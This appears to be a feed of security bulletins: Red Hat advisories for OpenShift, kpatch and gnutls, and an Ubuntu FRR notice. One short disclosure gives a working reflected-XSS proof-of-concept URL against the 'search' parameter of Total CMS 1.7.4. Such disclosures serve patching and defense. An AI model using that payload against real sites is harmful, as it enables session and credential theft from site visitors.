Red Hat Security Advisory 2023-3303-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.1.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.1 packages and security update  
Advisory ID:       RHSA-2023:3303-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3303  
Issue date:        2023-05-30  
CVE Names:         CVE-2022-41724   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.1 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.13 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.13.1. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:3304

Security Fix(es):

* golang: crypto/tls: large handshake records may cause panics  
(CVE-2022-41724)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2178492 - CVE-2022-41724 golang: crypto/tls: large handshake records may cause panics

6. Package List:

Red Hat OpenShift Container Platform 4.13:

Source:  
cri-o-1.26.3-6.rhaos4.13.gitb3475fb.el8.src.rpm  
openshift-ansible-4.13.0-202305180130.p0.g89eab30.assembly.stream.el8.src.rpm  
openshift-kuryr-4.13.0-202305171615.p0.g3055dbe.assembly.stream.el8.src.rpm

aarch64:  
cri-o-1.26.3-6.rhaos4.13.gitb3475fb.el8.aarch64.rpm  
cri-o-debuginfo-1.26.3-6.rhaos4.13.gitb3475fb.el8.aarch64.rpm  
cri-o-debugsource-1.26.3-6.rhaos4.13.gitb3475fb.el8.aarch64.rpm

noarch:  
openshift-ansible-4.13.0-202305180130.p0.g89eab30.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.13.0-202305180130.p0.g89eab30.assembly.stream.el8.noarch.rpm  
openshift-kuryr-cni-4.13.0-202305171615.p0.g3055dbe.assembly.stream.el8.noarch.rpm  
openshift-kuryr-common-4.13.0-202305171615.p0.g3055dbe.assembly.stream.el8.noarch.rpm  
openshift-kuryr-controller-4.13.0-202305171615.p0.g3055dbe.assembly.stream.el8.noarch.rpm  
python3-kuryr-kubernetes-4.13.0-202305171615.p0.g3055dbe.assembly.stream.el8.noarch.rpm

ppc64le:  
cri-o-1.26.3-6.rhaos4.13.gitb3475fb.el8.ppc64le.rpm  
cri-o-debuginfo-1.26.3-6.rhaos4.13.gitb3475fb.el8.ppc64le.rpm  
cri-o-debugsource-1.26.3-6.rhaos4.13.gitb3475fb.el8.ppc64le.rpm

s390x:  
cri-o-1.26.3-6.rhaos4.13.gitb3475fb.el8.s390x.rpm  
cri-o-debuginfo-1.26.3-6.rhaos4.13.gitb3475fb.el8.s390x.rpm  
cri-o-debugsource-1.26.3-6.rhaos4.13.gitb3475fb.el8.s390x.rpm

x86_64:  
cri-o-1.26.3-6.rhaos4.13.gitb3475fb.el8.x86_64.rpm  
cri-o-debuginfo-1.26.3-6.rhaos4.13.gitb3475fb.el8.x86_64.rpm  
cri-o-debugsource-1.26.3-6.rhaos4.13.gitb3475fb.el8.x86_64.rpm

Red Hat OpenShift Container Platform 4.13:

Source:  
cri-o-1.26.3-7.rhaos4.13.gitb3475fb.el9.src.rpm  
kata-containers-3.0.2-6.el9.src.rpm  
openshift-ansible-4.13.0-202305180130.p0.g89eab30.assembly.stream.el9.src.rpm  
podman-4.4.1-4.rhaos4.13.el9.src.rpm  
rpm-ostree-2023.3-1.el9_2.src.rpm

aarch64:  
cri-o-1.26.3-7.rhaos4.13.gitb3475fb.el9.aarch64.rpm  
cri-o-debuginfo-1.26.3-7.rhaos4.13.gitb3475fb.el9.aarch64.rpm  
cri-o-debugsource-1.26.3-7.rhaos4.13.gitb3475fb.el9.aarch64.rpm  
kata-containers-3.0.2-6.el9.aarch64.rpm  
podman-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
podman-debuginfo-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
podman-debugsource-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
podman-gvproxy-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
podman-gvproxy-debuginfo-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
podman-plugins-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
podman-plugins-debuginfo-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
podman-remote-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
podman-remote-debuginfo-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
podman-tests-4.4.1-4.rhaos4.13.el9.aarch64.rpm  
rpm-ostree-2023.3-1.el9_2.aarch64.rpm  
rpm-ostree-debuginfo-2023.3-1.el9_2.aarch64.rpm  
rpm-ostree-debugsource-2023.3-1.el9_2.aarch64.rpm  
rpm-ostree-devel-2023.3-1.el9_2.aarch64.rpm  
rpm-ostree-libs-2023.3-1.el9_2.aarch64.rpm  
rpm-ostree-libs-debuginfo-2023.3-1.el9_2.aarch64.rpm

noarch:  
openshift-ansible-4.13.0-202305180130.p0.g89eab30.assembly.stream.el9.noarch.rpm  
openshift-ansible-test-4.13.0-202305180130.p0.g89eab30.assembly.stream.el9.noarch.rpm  
podman-docker-4.4.1-4.rhaos4.13.el9.noarch.rpm

ppc64le:  
cri-o-1.26.3-7.rhaos4.13.gitb3475fb.el9.ppc64le.rpm  
cri-o-debuginfo-1.26.3-7.rhaos4.13.gitb3475fb.el9.ppc64le.rpm  
cri-o-debugsource-1.26.3-7.rhaos4.13.gitb3475fb.el9.ppc64le.rpm  
kata-containers-3.0.2-6.el9.ppc64le.rpm  
podman-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
podman-debuginfo-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
podman-debugsource-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
podman-gvproxy-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
podman-gvproxy-debuginfo-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
podman-plugins-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
podman-plugins-debuginfo-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
podman-remote-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
podman-remote-debuginfo-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
podman-tests-4.4.1-4.rhaos4.13.el9.ppc64le.rpm  
rpm-ostree-2023.3-1.el9_2.ppc64le.rpm  
rpm-ostree-debuginfo-2023.3-1.el9_2.ppc64le.rpm  
rpm-ostree-debugsource-2023.3-1.el9_2.ppc64le.rpm  
rpm-ostree-devel-2023.3-1.el9_2.ppc64le.rpm  
rpm-ostree-libs-2023.3-1.el9_2.ppc64le.rpm  
rpm-ostree-libs-debuginfo-2023.3-1.el9_2.ppc64le.rpm

s390x:  
cri-o-1.26.3-7.rhaos4.13.gitb3475fb.el9.s390x.rpm  
cri-o-debuginfo-1.26.3-7.rhaos4.13.gitb3475fb.el9.s390x.rpm  
cri-o-debugsource-1.26.3-7.rhaos4.13.gitb3475fb.el9.s390x.rpm  
kata-containers-3.0.2-6.el9.s390x.rpm  
podman-4.4.1-4.rhaos4.13.el9.s390x.rpm  
podman-debuginfo-4.4.1-4.rhaos4.13.el9.s390x.rpm  
podman-debugsource-4.4.1-4.rhaos4.13.el9.s390x.rpm  
podman-gvproxy-4.4.1-4.rhaos4.13.el9.s390x.rpm  
podman-gvproxy-debuginfo-4.4.1-4.rhaos4.13.el9.s390x.rpm  
podman-plugins-4.4.1-4.rhaos4.13.el9.s390x.rpm  
podman-plugins-debuginfo-4.4.1-4.rhaos4.13.el9.s390x.rpm  
podman-remote-4.4.1-4.rhaos4.13.el9.s390x.rpm  
podman-remote-debuginfo-4.4.1-4.rhaos4.13.el9.s390x.rpm  
podman-tests-4.4.1-4.rhaos4.13.el9.s390x.rpm  
rpm-ostree-2023.3-1.el9_2.s390x.rpm  
rpm-ostree-debuginfo-2023.3-1.el9_2.s390x.rpm  
rpm-ostree-debugsource-2023.3-1.el9_2.s390x.rpm  
rpm-ostree-devel-2023.3-1.el9_2.s390x.rpm  
rpm-ostree-libs-2023.3-1.el9_2.s390x.rpm  
rpm-ostree-libs-debuginfo-2023.3-1.el9_2.s390x.rpm

x86_64:  
cri-o-1.26.3-7.rhaos4.13.gitb3475fb.el9.x86_64.rpm  
cri-o-debuginfo-1.26.3-7.rhaos4.13.gitb3475fb.el9.x86_64.rpm  
cri-o-debugsource-1.26.3-7.rhaos4.13.gitb3475fb.el9.x86_64.rpm  
kata-containers-3.0.2-6.el9.x86_64.rpm  
podman-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
podman-debuginfo-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
podman-debugsource-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
podman-gvproxy-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
podman-gvproxy-debuginfo-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
podman-plugins-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
podman-plugins-debuginfo-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
podman-remote-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
podman-remote-debuginfo-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
podman-tests-4.4.1-4.rhaos4.13.el9.x86_64.rpm  
rpm-ostree-2023.3-1.el9_2.x86_64.rpm  
rpm-ostree-debuginfo-2023.3-1.el9_2.x86_64.rpm  
rpm-ostree-debugsource-2023.3-1.el9_2.x86_64.rpm  
rpm-ostree-devel-2023.3-1.el9_2.x86_64.rpm  
rpm-ostree-libs-2023.3-1.el9_2.x86_64.rpm  
rpm-ostree-libs-debuginfo-2023.3-1.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41724  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHsDtNzjgjWX9erEAQgEzA//bmsrt+XHGnLq3r4ECYF0VsWPcH5puPNe  
1X+C9Ztu2nU6Yf0KdDgo4XuGoFvIFPixUQvUcBEASLRIMPtC/DYEolvlOUz6LhfW  
GlpA+/ZcQ9P15n/jpt/yY18Dlqi0Yke4nFpiy61O6fvW7DHREWn2q0IM1M8LQc+u  
37YKO16hQB0AGWTB1Cjm1YN1CVChV70SHhKCDfs2ddAswcENgegFxncg4mtTJxLP  
xNCM4KdR7jM+QOHGltIHXRPE6UnJSAJj0B1V6UbUQdzW6faRbnnHx0EiCH4UAhnC  
nc5VzKrdu+ALYaGTdcXf5ey7+e0O86MSj2209cQ+EDxqmw5jk0hwJtoM+mJ6nKZ0  
idQe70ney0jQliuxyNs/b1mE8TCyJi8X9HN6m5L7W+RUHBPc7qcq+3gcCQxWoaIs  
oVIrHhs/Af219kVlMhwce4H61uaea4YEwHyCrnBlTqFlzb5ib1EflCJapOEO5GCo  
dnQ5x3UUb7rRtACT3xll4pSwlZuRsTn23qcq0RgP3RNwB+HVeLsKlHnngtaTpIPa  
KkyeR/MGEm9ZjRseDY8KN6b+s90lo+YCkpnpEFJXLyuN0WdvPQ+nXStL+SzhNyM4  
7/q4xd5u3upEFVrJvnboacb4ocC3eSoUl63Pf8+8I9nHiH/aPSmO0vzoY+66QB80  
ZK3i0CRt6+Y=  
=UbB/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3303-01

Total CMS version 1.7.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.totalcms.co/                                                   ││  Vendor   : Joe Workman                                                                ││  Software : Total CMS 1.7.4                                                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /blog/GET parameter 'search' is vulnerable to RXSShttps://website/blog/?search=yw1cz%22%3e%3cscript%3ealert(1)%3c%2fscript%3eeht7y[-] Done

Total CMS 1.7.4 Cross Site Scripting

Red Hat Security Advisory 2023-3287-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.19. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.12.19 bug fix and security update  
Advisory ID:       RHSA-2023:3287-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3287  
Issue date:        2023-05-31  
CVE Names:         CVE-2018-17419 CVE-2022-25147 CVE-2023-25652   
                   CVE-2023-25815 CVE-2023-29007   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.12.19 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.12.19. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2023:3286

Security Fix(es):

* dns: Denial of Service (DoS) (CVE-2018-17419)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:41fd42cc8b9f86fc86cc8763dcf27e976299ff632a336d393b8e643bd8a5f967

(For s390x architecture)  
The image digest is  
sha256:13666e036043e0d2283890259861a8b8132e6afc818973a2f8bab28d9947cd94

(For ppc64le architecture)  
The image digest is  
sha256:00b61dd3ae8d8da28eb7a5385eb1c7f200efa73023e44b1c220a7d041ca1bad1

(For aarch64 architecture)  
The image digest is  
sha256:3d73e42724be8f53f8511df17ef900225305226d37397ffde3385cbc6c55a132

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2188523 - CVE-2018-17419 dns: Denial of Service (DoS)

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-10275 - [4.12] Lazily unmount /proc/cmdline  
OCPBUGS-12787 - OLM CatalogSources in guest cluster cannot pull images if pre-GA  
OCPBUGS-13530 - Root device hints should accept by-path device alias  
OCPBUGS-13599 - OSD clusters' Ingress health checks & routes fail after swapping application router between public and private  
OCPBUGS-13719 - aws-ebs-csi-driver-operator ServiceAccount does not include the HCP pull-secret in its imagePullSecrets  
OCPBUGS-13739 - Failed to create STS resources on AWS GovCloud regions using ccoctl  
OCPBUGS-13743 - [4.12] container_network* metrics fail to report  
OCPBUGS-13750 - "pipelines-as-code-pipelinerun-go" configMap is not been used for the Go repository   
OCPBUGS-13757 - The MCD has a non-functional pivot command that should be deprecated   
OCPBUGS-13760 - Yum Config Manager Not Found  
OCPBUGS-13821 - Excessive memory consumption of aws-ebs-csi-driver-node pods (for 4.12)  
OCPBUGS-6848 - Service name search ability while creating the Route from console  
OCPBUGS-7439 - Egress service does not handle invalid nodeSelectors correctly  
OCPBUGS-7619 - Search page: LazyActionMenus are shown below Add/Remove from navigation button  
OCPBUGS-7924 - Developer - Topology : 'Filter by resource' drop-down i18n misses

6. References:

https://access.redhat.com/security/cve/CVE-2018-17419  
https://access.redhat.com/security/cve/CVE-2022-25147  
https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-25815  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHsDsNzjgjWX9erEAQh55g//fT4oDO3l6MuHn+2dcKCfrOgLHc7VltOU  
1iOWn0SsTEaM6ucJGbBnsvgobGVFyy7SinwYLM0UB1IXJyCLsaGPSGF/esKUfGS7  
LZo5Y1Htva+13tYeRlmCrjxiK9XkIK2Ib87Rl0VKBlPq6Y8t8P90uM9VQkENg2Bs  
ZJa8sslcKwE/ZZhya07BTdp+nQgUVBkBXTmF4GK5EGvtVrGaJNmBIPTaE57pyDbk  
bL3E2zqIwdCN1Idj3ef5/kM9MadQxFHXS7e214eWoZwDL7tdsKNnjGkYuoEI0yea  
N+qUUf60niYVGE5Fl4GvgFkcSNHGnrzqQkuvEmkZR623KgydTbtcHqxaMpUh5CeQ  
2Xc2XRL/9mDBLpm+Rg7LXsANDTl1+sE87UaHqmyRw1BVcmpsk/cxA7QLoWlX7tvP  
tZ2dt42h5qWy7gjbUZulZmx1fsLPy9nhNJW+LY0dRlwpv/QAca2giV2+69W6rdp/  
3ua8i/hYvEuwupm+wZPjyxMowuFCDZLMHNR0D+Q6yevxq0+d06TH2uiBalpGo94G  
Hi1Yxup4txtKoo1+Y9+VqVTfq6ATZ7GiDLq8h2ryHYMZgwYgqhSP+N1zPoIoBCj4  
k+IUNJvBmDwHtuAITiJW8Kh2+/VUF+nYkju5IE2SFDPBukMrJH10bsHU/5cB80wB  
FBSZg15VBkM=  
=7k+H  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3287-01

Ubuntu Security Notice 6136-1 - It was discovered that FRR incorrectly handled parsing certain BGP messages. A remote attacker could possibly use this issue to cause FRR to crash, resulting in a denial of service. This issue only affected Ubuntu 23.04. It was discovered that FRR incorrectly handled parsing certain BGP messages. A remote attacker could possibly use this issue to cause FRR to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6136-1  
June 05, 2023

frr vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in FRR.

Software Description:  
- frr: FRRouting suite of internet protocols

Details:

It was discovered that FRR incorrectly handled parsing certain BGP  
messages. A remote attacker could possibly use this issue to cause FRR to  
crash, resulting in a denial of service. This issue only affected Ubuntu  
23.04. (CVE-2023-31489)

It was discovered that FRR incorrectly handled parsing certain BGP  
messages. A remote attacker could possibly use this issue to cause FRR to  
crash, resulting in a denial of service. (CVE-2023-31490)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   frr                             8.4.2-1ubuntu1.1

Ubuntu 22.10:  
   frr                             8.1-1ubuntu3.2

Ubuntu 22.04 LTS:  
   frr                             8.1-1ubuntu1.4

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6136-1  
   CVE-2023-31489, CVE-2023-31490

Package Information:  
   https://launchpad.net/ubuntu/+source/frr/8.4.2-1ubuntu1.1  
   https://launchpad.net/ubuntu/+source/frr/8.1-1ubuntu3.2  
   https://launchpad.net/ubuntu/+source/frr/8.1-1ubuntu1.4

Ubuntu Security Notice USN-6136-1

Red Hat Security Advisory 2023-3351-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:3351-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3351  
Issue date:        2023-05-30  
CVE Names:         CVE-2023-32233   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kpatch-patch-4_18_0-477_10_1-1-1.el8_8.src.rpm

ppc64le:  
kpatch-patch-4_18_0-477_10_1-1-1.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_10_1-debuginfo-1-1.el8_8.ppc64le.rpm  
kpatch-patch-4_18_0-477_10_1-debugsource-1-1.el8_8.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-477_10_1-1-1.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_10_1-debuginfo-1-1.el8_8.x86_64.rpm  
kpatch-patch-4_18_0-477_10_1-debugsource-1-1.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHsDqdzjgjWX9erEAQjGGg/+IsR5ROGrGPCdQErhjDV0TKf9VOlh2F54  
DaRjsAdJjscBC2yWTQX6mnn6DbpjYGAtvlLJE9C8+gEgVZsjY6XJ5GbczOEfx6UX  
q4D7aba26JjFjBZHV9Tqw3Yj18OC2UjKfCez5Ec2+C/lowGRpalegbHRkl3TAeMt  
pq2P8RA2sTnxczVB2e3UuBDosNUdBay2KYa+Qhr0j3RaFjsghF+k4OysAmTVLiBy  
5fteDmqVk6hkHIM/Xir6pXIo34bXhdV2c/AN/bFGt9IJZd25niz9tRZmy8huQM4W  
zKaAe7OvV9MFZFVGFxArfqEPHTcR9KRca4nIfJAKKMMCDj2vktP7CclDpadnYBpG  
dDiuZFgwzYNIOXOyFsZEqy3vB0IQiHK0ogTBJKCEVdRZAWdyr28fLZGGAIyiRFe1  
eM64X6SmTz0GFDSiPawlx8wEnl5HHW8pc+//lDDP7zcRnmmv9dMckFIvrFZmboSM  
0XwJ1g3p7I0aKxyp2pFPxMj+RyK5WohkSQwW4il5mlmR3ZPx3N8kc3w0mV5yrPDp  
cZ2qK32YqatLlCdKIlrrjzFLy3MKeF7EHlY3yUUl/cZTdPKsGY0dEivAu6Lr6xfF  
C1qQY5/AuCRPWvGOrQEdJHTfqQDW2/dwmb2aIXT5cwJgUK4UVxK27W0+AudTRYfT  
C1TcJRiw5w4=  
=tC+V  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3351-01

Red Hat Security Advisory 2023-3361-01 - The gnutls packages provide the GNU Transport Layer Security library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: gnutls security update  
Advisory ID:       RHSA-2023:3361-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3361  
Issue date:        2023-05-31  
CVE Names:         CVE-2023-0361   
=====================================================================

1. Summary:

An update for gnutls is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The gnutls packages provide the GNU Transport Layer Security (GnuTLS)  
library, which implements cryptographic algorithms and protocols such as  
SSL, TLS, and DTLS.

Security Fix(es):

* gnutls: timing side-channel in the TLS RSA key exchange code  
(CVE-2023-0361)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2162596 - CVE-2023-0361 gnutls: timing side-channel in the TLS RSA key exchange code

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

aarch64:  
gnutls-c++-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-dane-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-devel-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-utils-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.aarch64.rpm

ppc64le:  
gnutls-c++-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.ppc64le.rpm  
